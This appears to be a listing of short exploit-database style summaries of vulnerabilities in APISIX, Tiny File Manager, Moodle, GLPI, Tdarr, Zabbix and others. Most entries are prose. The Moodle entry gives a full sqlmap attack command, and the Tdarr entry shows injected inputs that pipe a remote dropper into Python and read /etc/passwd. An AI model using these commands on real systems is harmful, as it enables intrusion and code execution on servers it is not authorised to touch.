A vulnerability in Apache APISIX versions 1.3 - 2.12.1 allows an attacker to execute arbitrary code on the target system. This is due to the lack of proper input validation when handling user-supplied data. An attacker can exploit this vulnerability by sending a maliciously crafted request to the target system.
Tiny File Manager 2.4.6 is vulnerable to Remote Code Execution (RCE) due to a lack of authentication. An attacker can exploit this vulnerability by sending a malicious POST request to the vulnerable application. This will allow the attacker to execute arbitrary code on the server.
A theme upload functinality in Pluck CMS before 4.7.16 allows an admin privileged user to gain access in the host through the "themes files", which may result in remote code execution.
Moodle 2.7dev (Build: 20131129) to 3.11.5+ 2nd Order SQLi Exploit by muffin (@mufinnnnnnn). Exploit allows an authenticated user to inject malicious SQL code into the application. The exploit requires the user to define variables at the top of the tamper() function, create a file called req.txt, and run the tamper script with the command 'python sqlmap.py -u "http://127.0.0.1/moodle/badges/criteria_settings.php?badgeid=badge-id-replace-me&add=1&type=6" --tamper=moodle_2nd_order_sqli.py --data=@req.txt --level=5 --risk=3 --dbms=mysql --threads=10 --batch'
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
This exploit is related to the Baixar GLPI Project 9.4.6. It is a SQL injection vulnerability that allows an attacker to execute malicious SQL queries on the vulnerable system. The exploit is triggered by sending a specially crafted request to the plugins/ramo/ramoapirest.php/getOutdated?idu=-1 endpoint. The attacker can then use the sqlmap tool to enumerate the databases on the vulnerable system.
The Help tab contains a terminal for both FFmpeg and HandBrake. These terminals do not include input filtering which allows the user to chain commands and spawn a reverse shell. eg. `--help; curl http://192.168.0.2/dropper.py | python` or `--help;whoami;cat /etc/passwd`. Tdarr is not protected by any auth by default and no credentials are required to trigger RCE.
Execute commands without authentication as admin user, To use it in all versions, we only enter the router ip & Port(if available) in the script and Execute commands with root user.
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
This exploit is tested against Zabbix 5.0.17 only. It is a blind RCE exploit, so the results of the exploit will not be visible on the site. The exploit uses a Session object to authenticate the user and then adds an item with a system.run command to execute the code. The attacker IP and port are used as the trapper hosts. If the item name is found in the response text, the exploit is successful.
Services By CQR